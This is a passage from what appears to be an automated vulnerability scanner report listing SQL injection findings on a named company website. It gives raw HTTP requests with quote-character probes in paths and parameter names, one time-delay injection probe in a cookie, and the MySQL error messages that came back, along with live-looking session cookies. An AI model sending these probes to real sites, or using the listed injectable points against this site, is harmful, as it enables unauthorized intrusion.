User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1'waitfor%20delay'0%3a0%3a20'--; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:53:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.48. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC; __utma=94003201.1070057693.1303147760.1303147760.1304727090.2; __utmb=94003201.1.10.1304727090; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:36 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...

2.49. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing'/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 27717
Date: Fri, 06 May 2011 19:12:53 GMT
X-Varnish: 1128246861
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing''/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29453
Date: Fri, 06 May 2011 19:12:54 GMT
X-Varnish: 1128247139
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.50. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images'/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 27716
Date: Fri, 06 May 2011 19:12:59 GMT
X-Varnish: 1128247898
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images''/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29451
Date: Fri, 06 May 2011 19:13:00 GMT
X-Varnish: 1128248119
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.51. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:13:05 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:13:06 GMT
Connection: Keep-Alive
Content-Length: 29451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.52. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:12:40 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:12:41 GMT
Connection: Keep-Alive
Content-Length: 29451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.53. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/index.php HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:16:42 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 27703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

2.54. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing/index.php' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:17:06 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 27724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/index.php''' at line 1)<br>
...[SNIP]...

2.55. http://www.millerwelds.com/financing/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/index.php?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:15:50 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 13812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/index.php?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:15:51 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 15555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
